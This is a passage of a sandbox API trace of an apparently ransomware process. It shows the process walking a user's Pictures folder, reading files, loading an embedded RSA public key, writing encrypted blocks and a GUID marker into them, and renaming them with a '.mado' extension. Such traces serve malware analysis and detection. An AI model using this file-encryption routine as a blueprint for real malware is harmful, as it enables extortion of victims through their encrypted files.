hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6f0a8 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c50 [0206.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c08 [0206.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c20 [0206.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bf0 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c68 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c38 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c80 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c08 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c08 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c50 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b67190 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c80 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b673c0 [0206.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b674d8 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c08 | out: hHeap=0x2c0000) returned 1 [0206.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67190 | out: hHeap=0x2c0000) returned 1 [0206.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321738 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b674d8 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b673c0 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c38 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c68 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c20 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bf0 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bd8 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b86fc8 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6f0a8 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b672a8 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.442] WriteFile (in: hFile=0x63c, lpBuffer=0x3b87c98*, nNumberOfBytesToWrite=0x16e61, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b87c98*, lpNumberOfBytesWritten=0x39cfb14*=0x16e61, lpOverlapped=0x0) returned 1 [0206.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b87c98 | out: hHeap=0x2c0000) returned 1 [0206.442] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16e66, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.443] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6efa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6efa0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0206.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0206.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b7b950 [0206.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b7b950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0206.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b7bd80 [0206.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0206.443] WriteFile (in: hFile=0x63c, lpBuffer=0x3b7bd80*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b7bd80*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0206.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7bd80 | out: hHeap=0x2c0000) returned 1 [0206.443] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.443] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.443] CloseHandle (hObject=0x63c) returned 1 [0206.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6360 [0206.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x3b7b950 [0206.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6360 | out: hHeap=0x2c0000) returned 1 [0206.445] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\AdCQch.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\adcqch.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\AdCQch.gif.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\adcqch.gif.mado")) returned 1 [0206.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.445] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0206.447] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4893800, ftCreationTime.dwHighDateTime=0x1d5da78, ftLastAccessTime.dwLowDateTime=0x539347d0, ftLastAccessTime.dwHighDateTime=0x1d5e5da, ftLastWriteTime.dwLowDateTime=0x539347d0, ftLastWriteTime.dwHighDateTime=0x1d5e5da, nFileSizeHigh=0x0, nFileSizeLow=0x16dd4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="If0DlMdLe6v.png", cAlternateFileName="IF0DLM~1.PNG")) returned 1 [0206.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77c48 [0206.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x106) returned 0x3b67078 [0206.447] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.447] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\If0DlMdLe6v.png") returned=".png" [0206.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\If0DlMdLe6v.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\if0dlmdle6v.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.448] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=93652) returned 1 [0206.448] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.450] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16dae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.450] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.452] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.452] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x16dd4, lpOverlapped=0x0) returned 1 [0206.453] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.453] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.453] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.453] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0206.454] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.454] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.454] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.454] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.454] GetLastError () returned 0x0 [0206.454] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.454] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0206.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.454] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.454] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.454] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16dd0) returned 0x3b87c98 [0206.455] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b86fc8 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bd8 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87010 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bf0 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c20 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c68 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c38 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b816a8 [0206.455] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b816a8, Size=0x218) returned 0x3b7c6a8 [0206.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c20 | out: hHeap=0x2c0000) returned 1 [0206.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c38 | out: hHeap=0x2c0000) returned 1 [0206.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c68 | out: hHeap=0x2c0000) returned 1 [0206.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c68 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79c38 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79c20 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b672a8 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b673c0 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b672a8 | out: hHeap=0x2c0000) returned 1 [0206.457] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16dd4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.457] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6efa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6efa0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.457] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.457] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.457] CloseHandle (hObject=0x63c) returned 1 [0206.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292de0 [0206.458] RtlAllocateHeap 